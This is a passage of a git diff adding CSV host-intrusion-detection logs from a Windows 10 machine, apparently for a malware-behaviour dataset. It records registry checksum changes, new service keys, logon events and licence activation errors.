checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : '2ef8853d6fca9c24a1d8a1179df3b366' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '40faabdd2e3085b497da125adc67a00f205fe003' +" +"Apr 6, 2020 @ 08:42:38.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29' was added. +" +"Apr 6, 2020 @ 08:42:38.963",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 08:42:38.948",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:33.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '1ebdcefac825fba82f9e97f61638e395' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : 'ead23002ea63c0d0ea482df90c6c02d8f9441dd7' +" +"Apr 6, 2020 @ 08:42:32.431",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:29.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'b0817392d21e4502332baa716499c3bb' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'fd4a4426a40a883487f3cc1d0bf3aafba0d91dff' +" +"Apr 6, 2020 @ 08:42:29.369",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : '6b263e7f7f9f5df60b5ba6c86e1d3e84' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '2b734daaadaeb6ce4fae48d91f5494165ca31e14' +" +"Apr 6, 2020 @ 08:42:28.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 08:42:25.901",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:42:24.510",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 08:42:20.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : 'ab713c4b4d0f5b552b126609fb3b75d4' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'e32118e6d00839882de6534855328ee6ea626937' +" +"Apr 6, 2020 @ 08:42:12.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '7d860345e2361b6fe3f0b507144407de' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '2bb6b3a39b4dd7c401a2d64d3b709e3461441900' +" +"Apr 6, 2020 @ 08:42:11.214",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:11.198",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:11.104",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:11.088",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:10.832",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:10.810",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:10.209",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:10.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:10.011",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:09.979",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:09.807",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '5b06acdc8ed6732e0719fab302999091' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'a4fa3b6743a44afa0d4ad52e2b3d1fc14c834bde' +" +"Apr 6, 2020 @ 08:42:08.480",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:08.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:08.275",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:08.259",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:08.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2af29' was added. +" +"Apr 6, 2020 @ 08:42:08.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:05.962",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29' was added. +" +"Apr 6, 2020 @ 08:42:05.915",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 08:42:05.900",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 08:42:05.884",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 08:42:05.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 08:42:05.853",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 08:42:05.824",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:04.948",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2af29' was added. +" +"Apr 6, 2020 @ 08:42:04.931",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:04.649",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : '06af42748390daff7b5be7ab37ce006b' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '95537e6767865122fd6069ff8cba7c0c15128cfe' +" +"Apr 6, 2020 @ 08:42:04.634",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '0ad0f48020a8ebbc63203c341912f537' +New md5sum is : '43a77ab77644af5b48059f1a434b4f64' +Old sha1sum was: '85a0461adc8c3056a8b46539db16a9bcbfcccb42' +New sha1sum is : '3bb88ce280ecae452b20b6562ce7691109a77407' +" +"Apr 6, 2020 @ 08:42:04.588",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '61861e9234c9745ccfd26c43b3589c1e' +New md5sum is : '8e594f3f92f6bf1d9d7c6ed70cc63483' +Old sha1sum was: '047a670f4ac17480436455d7920b1c013f94d076' +New sha1sum is : 'db4e5315a98cea97251d1bebbbaed6f0edd22768' +" +"Apr 6, 2020 @ 08:42:02.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2af29' was added. +" +"Apr 6, 2020 @ 08:42:02.072",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2af29\Security' was added. +" +"Apr 6, 2020 @ 08:42:01.015",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 6, 2020 @ 08:41:47.650",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"Apr 6, 2020 @ 08:41:45.556",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:41:15.992",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 08:41:05.478",3,"Windows User Logoff", +"Apr 6, 2020 @ 08:41:05.462",3,"Windows User Logoff", +"Apr 6, 2020 @ 08:41:05.430",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 08:41:05.399",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 08:40:49.399",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:40:45.898",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 08:40:40.398",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 08:40:37.383",3,"The Windows Search Service started", +"Apr 6, 2020 @ 08:40:36.151",3,"The database engine attached a database", +"Apr 6, 2020 @ 08:40:36.016",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 08:40:35.896",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:40:32.790",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 08:40:29.161",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 08:40:29.136",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 08:40:28.477",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 08:40:27.898",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 08:40:26.618",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:40:24.624",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'." +"Apr 6, 2020 @ 08:39:51.536",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 08:39:51.522",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 08:39:47.944",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 08:39:47.868",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 08:37:47.391",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : 'c0405481b74cf6174a880af1ccc1d4b0' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'b7d4bb4d3cde4fa21584725503c78a8e4d7d6788' +" +"Apr 6, 2020 @ 08:37:47.332",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 08:37:36.031",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'f5837d19200fde256d1b45c83baa0a62' +New md5sum is : '2d7700c4aad93b7ea9895df444a9e372' +Old sha1sum was: '02b87378b62f94cbda8368aad963101b79b8bedb' +New sha1sum is : 'c7564ff6dc5d69537cd3bce619e28a3f1f103254' +" +"Apr 6, 2020 @ 08:37:35.046",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '5950f3809329b90b7cce78b6656eb8fc' +New md5sum is : 'f8834fc0455ef259559a8ced142930a5' +Old sha1sum was: 'a47f7cd0ccdd5c421ff3869cb4f5405670613f35' +New sha1sum is : '058f6d910ba5475de9cdaf669663685b92c3f0ca' +" +"Apr 6, 2020 @ 08:37:34.967",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : '728627011eedd28411cf4e1f2a30d1ca' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : '26576187b3bbee39309e7ebe95de85749ea7b9d2' +" +"Apr 6, 2020 @ 08:36:51.874",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:36:44.024",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '0ad0f48020a8ebbc63203c341912f537' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '85a0461adc8c3056a8b46539db16a9bcbfcccb42' +" +"Apr 6, 2020 @ 08:36:44.013",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '61861e9234c9745ccfd26c43b3589c1e' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '047a670f4ac17480436455d7920b1c013f94d076' +" +"Apr 6, 2020 @ 08:35:31.302",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 08:35:08.882",3,"Windows Logon Success", +"Apr 6, 2020 @ 08:34:22.502",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 08:34:22.486",8,"Windows Audit Policy changed", +"Apr 6, 2020 @ 08:34:02.345",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '7a736e3adebf5a509150741055fa891a' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: '1190d3e310a517ef8601b9cb3e3298006d42b480' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 6, 2020 @ 08:34:02.314",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" diff --git a/data/MW_19_HIDS_2.csv b/data/MW_19_HIDS_2.csv new file mode 100644 index 0000000..59fe206 --- /dev/null +++ b/data/MW_19_HIDS_2.csv @@ -0,0 +1,1035 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:46:05.360",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:53.069",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A1C + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:45:52.862",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A4B + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 26, 2020 @ 10:45:52.829",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A4B + Linked Logon ID: 0xB5A1C + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:52.820",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xB5A1C + Linked Logon ID: 0xB5A4B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3e4 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:49.815",5,"Logon Failure - Unknown user or bad password",,"""An account failed to log on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Type: 2 + +Account For Which Logon Failed: + Security ID: S-1-0-0 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + +Failure Information: + Failure Reason: Unknown user name or bad password. + Status: 0xC000006D + Sub Status: 0xC000006A + +Process Information: + Caller Process ID: 0x3e4 + Caller Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon request fails. It is generated on the computer where access was attempted. + +The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network). + +The Process Information fields indicate which account and process on the system requested the logon. + +The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The authentication information fields provide detailed information about this specific logon request. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:44.322",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:38.765",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 26, 2020 @ 10:45:38.655",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 26, 2020 @ 10:45:38.240",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: 